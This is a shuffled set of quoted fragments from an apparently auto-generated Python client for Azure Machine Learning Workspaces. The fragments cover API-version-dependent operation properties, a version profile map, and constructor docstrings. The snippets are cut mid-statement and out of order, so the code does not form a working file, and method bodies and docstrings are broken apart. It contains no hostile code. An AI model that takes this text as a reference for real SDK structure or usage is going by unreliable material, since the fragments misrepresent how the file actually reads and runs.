await self._client.close() async def __aenter__(self):", "Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>`", "in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the", "\"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as", "have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance", "have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance", "not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self):", "ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version =", "2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01:", "MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: #", "Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>`", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version ==", "\"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as", "JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API", "clouds (Azure Stack, Azure Government, Azure China, etc.). By default, it uses the", "def _models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v,", "2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import", "not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self):", "group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on", "provided, or if missing in profile. :type api_version: str :param base_url: Service URL", "'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the", "API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01:", "'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" )", "Machine Learning Workspace resources. This ready contains multiple API versions, to help you", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API", "import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version:", "have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance", "== '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version {}", "import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version: *", "int polling_interval: Default waiting time between two polls for LRO operations if no", "from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import", "you deal with all of the Azure clouds (Azure Stack, Azure Government, Azure", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call')", "self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version,", "not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self):", "= self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else:", ":class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations", "depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return", "'2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does", "from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01':", "waiting time between two polls for LRO operations if no Retry-After header is", "@property def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\"", "api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version", ":class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations", "version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API", "return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API", "RunsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "* 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "'2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "* 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "== '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {}", "profile. :param credential: Credential needed for the client to connect to Azure. :type", "depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1')", "async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self, *exc_details): await self._client.__aexit__(*exc_details)", ":class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version", "= self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif", "Azure clouds (Azure Stack, Azure Government, Azure China, etc.). By default, it uses", "group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on", "group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on", "def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version))", "# type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client =", "version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version))", "== '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {}", "'2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0',", "* v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations", "group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01':", "subscription_id: The ID of the target subscription. :type subscription_id: str :param api_version: API", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "{} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "version available on public Azure. For production, you should stick to a particular", "..v2022_05_01 import models return models raise ValueError(\"API version {} is not available\".format(api_version)) @property", "have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance", "resources. This ready contains multiple API versions, to help you deal with all", "if missing in profile. :type api_version: str :param base_url: Service URL :type base_url:", "'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run':", "@property def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` *", "the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\"", "str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default,", "..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version", "@property def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` *", "on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version", "version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. :type", "depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview:", "import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version))", "version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version: *", "version {} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version", "version {} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else:", "== '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {}", "have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance", "..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models", "ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "..v2022_02_01_preview import models return models elif api_version == '2022-05-01': from ..v2022_05_01 import models", "operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends", "data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version =", "from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API", "operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends", "depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API version:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version:", "api_version: str :param base_url: Service URL :type base_url: str :param profile: A profile", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API", "isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: *", "_PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations':", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise", "== '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from", "v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise", "@property def run(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\"", "group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on", "Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>`", "the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version ==", "from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not", "does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "* 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version", "* 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections')", "@classmethod def _models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if", "ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass", "on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>`", "version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass", "\"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version))", "'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers':", "not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self):", "group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview':", "KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration", "ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "project root for # license information. # # Code generated by Microsoft (R)", "models return models elif api_version == '2021-10-01': from ..v2021_10_01 import models return models", "* 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers')", "..registry_discovery import models return models elif api_version == 'v1.0': from ..runhistory import models", "def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API version:", "raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config,", "@property def spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\"", "does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01':", "does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance", "from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version =", "from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview:", "'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version:", "models raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends", "ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", 